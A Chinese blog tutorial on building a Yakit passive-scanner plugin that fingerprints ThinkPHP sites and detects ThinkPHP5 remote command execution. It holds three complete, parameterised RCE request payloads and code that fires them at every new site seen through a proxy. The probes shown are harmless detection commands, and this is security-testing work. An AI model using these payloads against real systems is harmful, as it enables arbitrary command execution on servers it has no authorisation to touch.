thinkphp5 rce漏洞被动扫描插件[mitm]

最新推荐文章于 2024-08-14 10:23:53 发布
最新推荐文章于 2024-08-14 10:23:53 发布
阅读量323 收藏
点赞数
文章标签: 网络 安全 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YakProject/article/details/134251444
版权

环境搭建

环境使用http://vulfocus.io/,启动一个thinkphp实例

指纹检测

因为可能同时开启多个被动扫描插件,如果所有网站都做一遍扫描,会造成很大程度上的资源浪费,可能会导致代理变慢

所以在开始扫描前需要对网站进行指纹识别

header特征

使用fofa搜索app="thinkphp"

发现大多数thinkphp的站点header都有X-Powered-By: ThinkPHP

还有X-Powered-By: thinkphp-bjyadmin(可能是经thinkphp二开的框架)

所以可以通过正则,对header进行匹配:

thinkphpFingers = ["X-Powered-By: .*((?i)thinkphp).*"] 
// headers是返回包的header 
checkHeader = fn(headers){ 
    for _,thinkphpFinger = range thinkphpFingers{ 
        if re.Match(thinkphpFinger,headers) { 
            return true 
        } 
    } 
    return false 
}

favicon hash特征

通过thinkphp框架的默认favicon.ico识别

在yak里可以直接获取到站点favicon.ico的hash

hash, err = http.RequestFaviconHash(<favicon.ico地址>)

得到thinkphp的favicon.ico的hash为1165838194,所以做如下判断

// rootUrl是网站根路径 
chechIcon2 = fn(rootUrl){ 
    hash, err = http.RequestFaviconHash(rootUrl+"favicon.ico") 
    return hash == "1165838194" 
}

thinkphp的特殊Controller

在p牛的博客中看到thinkphp有个控制器4e5e5d7364f443e28fbf0d3ae744a59a,会返回站点的图标

所以当http://xxx.xx/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a返回一个图片时,就可以判定这是thinkphp站点

rsp,_ = http.Get("http://xxx.xx/?c=4e5e5d7364f443e28fbf0d3ae744a59a") 
rspB,_ = http.dump(rsp) 
header,body = str.SplitHTTPHeadersAndBodyFromPacket(rspB) 
println(string(body))

输出如图

从这里提取出两个指纹"IHDR"和"PNG",如下

// rootUrl是网站根路径
chechIcon1 = fn(rootUrl){
u = rootUrl+"?c=4e5e5d7364f443e28fbf0d3ae744a59a"
rsp,_ = http.Get(u)
rspB,_ = http.dump(rsp)
header,body = str.SplitHTTPHeadersAndBodyFromPacket(rspB)
return str.Contains(string(body),"IHDR") && (str.Contains(string(body),"PNG") || str.Contains(string(body),"JPEG"))
}

漏洞检测

如果返回包中包含预期的结果,就可以判定命令执行成功了,在此基础上,这个"预期的结果"还要和正常返回包区分开

如果是linux机器,可以执行这条命令echo -n 'asdasczxc' | md5sum,如果网站返回包包含asdasczxc的hash,则说明命令执行成功

如果是windows机器,可以执行dir C:\Windows\,因为windows机器C:\Windows\目录下有system.ini文件,所以如果返回包包含system.ini,则说明命令执行成功

paylaod

可以通过fuzz标签去写payload,如

GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={{url({{params(cmd)}})}} HTTP/1.1 
Host: {{params(target)}} 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: deflate 
Accept-Language: zh-CN,zh;q=0.9 
Cache-Control: max-age=0 
Connection: close 
Content-Length: 0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36

在poc.HTTP支持使用fuzz标签

持久化

yak的risk库可以对数据持久化

例如:

risk.NewRisk("https://www.baidu.com", risk.title("html源码泄露"), risk.type("敏感信息泄露"),risk.level("高危"))

mitm插件编写

mitm模块主要提供了5个hook方法,创建新插件时的模板有详细的注解介绍

因为每个网站只需要检测一次,所以选用mirrorNewWebsite方法(每当出现一个新网站时,此方法会被调用)

rootUrl = str.ParseStringUrlToWebsiteRootPath(url) 
// 手动对favicon.ico的hash计算方法就是,先base64,再MMH3Hash32计算 
if str.EndsWith(url, "favicon.ico") && codec.MMH3Hash32(codec.EncodeBase64(rsp)) == "1165838194"{ 
    testExp(rootUrl) 
}

上面这方法调试发现,即使是第一次访问的网站,有时浏览器不会请求favicon.ico

所以还是用常规的http.RequestFaviconHash方法去获取hash

最终代码

payloads = [ 
    { 
        "name":"thinkphp5.0.23 5.0.7 ~ 5.0.23命令执行", 
        "payload":`GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={{url({{params(cmd)}})}} HTTP/1.1 
Host: {{params(target)}} 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: deflate 
Accept-Language: zh-CN,zh;q=0.9 
Cache-Control: max-age=0 
Connection: close 
Content-Length: 0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 
 
`}, 
 
{ 
    "name":"Thinkphp captcha命令执行", 
    "payload":`POST /index.php HTTP/1.1 
Host: {{params(target)}} 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: deflate 
Accept-Language: zh-CN,zh;q=0.9 
Cache-Control: no-cache 
Connection: close 
Content-Length: 52 
Content-Type: application/x-www-form-urlencoded 
Origin: http://123.58.236.76:59844 
Pragma: no-cache 
Referer: http://123.58.236.76:59844/index.php?s=index/index/index 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 
 
s={{url({{params(cmd)}})}}&_method=__construct&filter%5B%5D=system 
 
`},{ 
        "name":"5.1.x命令执行", 
        "payload":`GET /index.php?s=index/\think\Request/input&filter=system&data={{url({{params(cmd)}})}} HTTP/1.1 
Host: {{params(target)}} 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Accept-Encoding: deflate 
Accept-Language: zh-CN,zh;q=0.9 
Cache-Control: max-age=0 
Connection: close 
Content-Length: 0 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 
 
`}] 
 
thinkphpFingers = ["X-Powered-By: .*((?i)thinkphp).*"] 
 
testExp = fn(rootUrl){ 
    yakit_output(sprintf("%s发现thinkphp框架",rootUrl)) 
    host,port,_ = str.ParseStringToHostPort(rootUrl) 
    target = sprintf("%s:%d",host,port) 
    for _,payload = range payloads{ 
        out = "" 
        payloadR = "" 
        randomStr = str.RandStr(20) 
        result = codec.Md5(randomStr) 
        cmd = sprintf("echo -n '%v' | md5sum", randomStr) 
        rsp,req,_ = poc.HTTP(payload["payload"], poc.params({"cmd": cmd,"target": target})) 
        headers, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp) 
        // println(string(headers)) 
        if str.MatchAllOfSubString(body, result){ 
            payloadR,_ = str.SplitHTTPHeadersAndBodyFromPacket(req) 
            out = sprintf("%s存在漏洞, pocName:%s, OS: Linux",rootUrl,payload["name"]) 
        } 
 
        rsp,req,_ = poc.HTTP(payload["payload"], poc.params({"cmd": "dir C:\\Windows\\","target": target})) 
        headers, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp) 
        // println(string(headers)) 
        if str.MatchAllOfSubString(body, "system.ini"){ 
            payloadR,_ = str.SplitHTTPHeadersAndBodyFromPacket(req) 
            out = sprintf("%s存在漏洞, pocName:%s, OS: Windows",rootUrl,payload["name"]) 
        } 
        if out != ""{ 
            yakit_output(out) 
            risk.NewRisk(rootUrl,risk.title(sprintf("%s存在RCE漏洞",rootUrl)),risk.details(out),risk.type("RCE"),risk.payload(payloadR)) 
        } 
    } 
} 
 
checkHeader = fn(headers){ 
    for _,thinkphpFinger = range thinkphpFingers{ 
        if re.Match(thinkphpFinger,headers) { 
            return true 
        } 
    } 
    return false 
} 
 
chechIcon1 = fn(rootUrl){ 
    u = rootUrl+"?c=4e5e5d7364f443e28fbf0d3ae744a59a" 
    rsp,_ = http.Get(u) 
    rspB,_ = http.dump(rsp) 
    header,body = str.SplitHTTPHeadersAndBodyFromPacket(rspB) 
    return str.Contains(string(body),"IHDR") && (str.Contains(string(body),"PNG") || str.Contains(string(body),"JPEG"))  
} 
chechIcon2 = fn(rootUrl){ 
    hash, err = http.RequestFaviconHash(rootUrl+"favicon.ico") 
    return hash == "1165838194" 
} 
 
 
# mirrorNewWebsite 每新出现一个网站,这个网站的第一个请求,将会在这里被调用! 
mirrorNewWebsite = func(isHttps /*bool*/, url /*string*/, req /*[]byte*/, rsp /*[]byte*/, body /*[]byte*/) { 
    rootUrl = str.ParseStringUrlToWebsiteRootPath(url) 
    headers, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp) 
    if checkHeader(headers) || chechIcon2(rootUrl) || chechIcon1(rootUrl){ 
        testExp(rootUrl) 
    } 
  
} 
 
# mirrorNewWebsitePath 每新出现一个网站路径,关于这个网站路径的第一个请求,将会在这里被传入回调 
mirrorNewWebsitePath = func(isHttps /*bool*/, url /*string*/, req /*[]byte*/, rsp /*[]byte*/, body /*[]byte*/) { 
    // rootUrl = str.ParseStringUrlToWebsiteRootPath(url) 
    // if str.EndsWith(url, "favicon.ico") && codec.MMH3Hash32(codec.EncodeBase64(rsp)) == "1165838194"{ 
    //     testExp(rootUrl) 
    // } 
}

插件效果

Yak官方资源

Yak 语言官方教程:
https://yaklang.com/docs/intro/
Yakit 视频教程:
https://space.bilibili.com/437503777
Github下载地址:
https://github.com/yaklang/yakit
Yakit官网下载地址:
https://yaklang.com/
Yakit安装文档:
https://yaklang.com/products/download_and_install
Yakit使用文档:
https://yaklang.com/products/intro/
常见问题速查:
https://yaklang.com/products/FAQ

YakProject
关注
ThinkPHP5RCE漏洞复现
不想当脚本小子的脚本小子
06-10 991
又到了闲来无事的漏洞复现时间~~~ ThinkPHP RCE漏洞是由于变量覆盖而引起的,漏洞源于可以对thinkphp/library/think/Request.php文件中的method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致RCE,其攻击点较为多,有些还具有限制条件,另外该漏洞在利用上会出现一些问题。 漏洞影响范围:<= 5.0.23、<= 5.1.32。 ...
thinkphp 5.0.23 rce漏洞复现
ffff5的博客
05-19 704
thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。 环境搭建 使用vulhub搭建环境,过程不赘述。 漏洞复现 抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: IP:PORT Accept-Encoding: gzip,
Php漏洞扫描
12-19
Php漏洞扫描
php网站漏洞大全,Webvulscan:一款基于PHP的漏洞扫描
weixin_35080040的博客
03-09 1154
工具简介WebVulScan是一款Web应用程序漏洞扫描工具,而且它本身就是一款采用PHP开发的Web应用程序。该工具支持远程或本地使用,安全研究人员可以随时随地使用WebVulScan来扫描Web应用中的安全漏洞。在漏洞扫描的过程中,WebVulScan会将扫描的详细信息实时传送给用户,并且信息会进行动态更新。这些详细信息包含扫描状态、爬取到的URL数量,已发现的漏洞数量、以及已发现的漏洞详情。...
针对thinkphp站点的漏洞挖掘和经验分享
最新发布
2301_80115097的博客
08-14 1153
目前在学习和研究thinkphp相关漏洞的打法,然后最近对于thinkphp资产的收集方面有了一个简单的认识,然后写一篇新手看的thinkphp相关的漏洞收集和挖掘的文章来分享下。然后后面是给师傅们分享下后台文件上传,然后直接打一个getshell的漏洞点。
基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-18 7160
基于JavaFx的Thinkphp漏洞扫描工具Rexha的一些使用说明。支持多种payload。多线程并发批量扫描。支持漏洞类型包括:ThinkPHP-2.x-RCE",ThinkPHP-5.0.23-RCE","ThinkPHP5.0.x-5.0.23通杀RCE","ThinkPHP5-SQL注入&敏感信息泄露","ThinkPHP 3.x 日志泄露NO.1","ThinkPHP 3.x 日志泄露NO.2","ThinkPHP 5.x 数据库信息泄露"。
linux php漏洞扫描工具,TPScan Thinkphp漏洞扫描器 命令执行
weixin_28684449的博客
03-22 2456
TPScan (Thinkphp漏洞扫描器)TPScan项目地址TPScanTPScan目前能检测的Thinkphp漏洞列表[18个]thinkphp时间盲注thinkphp5.0.23debug模式thinkphp5.0.23命令执行ThinkPHP5SQL注入漏洞&&敏感信息泄露thinkphp5.*driver_display命令执行thinkphp5.0.1...
PHP 开发 框架安全ThinkPHP 序列 漏洞测试.
Innocence_0的博客
07-23 1073
本身不断更新和改进,以应对新的安全威胁和漏洞。什么是 ThinkPHP 框架.ThinkPHP 框架的安全特性:开启 漏洞 靶场:(1)查看目录:(2)启用 vulhub 漏洞:(3)进行浏览:主机的 8080 端口.进行 漏洞 测试:(1)查看是不是 ThinkPHP 框架.(查看数据包的信息)(2)如果知道他是这个漏洞,则可以自己使用工具进行测试。(3)漏洞的利用:(4)使用连接工具(蚁剑)进行连接.
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
ThinkphpRCE:Thinkphp rce扫描脚本,附带日志扫描
03-19
Thinkphp rce扫描脚本,附带日志扫描 2020.06.18更新 增加使用代理池功能 增加输出到文件功能 去掉了一些使用syetem函数的payload和重复payload(导致IP容易被封住,且必要性不是很大) 优化了一些代码,多个网站的...
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
PHP include 漏洞扫描
06-05
PHP包含漏洞扫描器的源代码,horse_b制作,多线程的好例子下载可以到www.horseb.org的"原创源码"里下载
php扫描,SQL注入扫描,漏洞扫描
08-31
这是一款简单的集SQL注入漏洞利用、后台页面查找、服务器漏洞扫描、端口扫描和web页面抓取等功能于一身的安全工具
PHP漏洞扫描工具.zip
01-06
PHP漏洞扫描工具.zip
PHP漏洞扫描软件源码 v1.0 beta
10-07
此程序用C#+vs2008编译! 功能介绍: 1、扫描注入点; 2、SQL漏洞扫描; 3、注入点暴库; 4、后台扫描; 5、MD5暴力破解; 6、WEB服务器安全检测; 7、密码探测; 8、给初学者提供一些思
ThinkPHP一键检测ThinkPHP漏洞,漏洞检测工具
程序发烧猿's Blog
02-24 8225
本工具一键检测网上流行的ThinkPHP漏洞,如存在漏洞请尽快修复。漏洞可造成shell提权,直接用中国菜刀就可以连接,修改服务器文件!危害极大!最好是禁用eval等危险函数!
ThinkPHP5 RCE漏洞详解与Payload汇总
"这篇博客文章是关于ThinkPHP5远程代码执行(RCE漏洞的总结,主要探讨了两个主要版本的漏洞ThinkPHP5.0-5.0.24和ThinkPHP5.1.0-5.1.30,并列举了一些可能的payload示例。" 在网络安全领域,尤其是对于Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值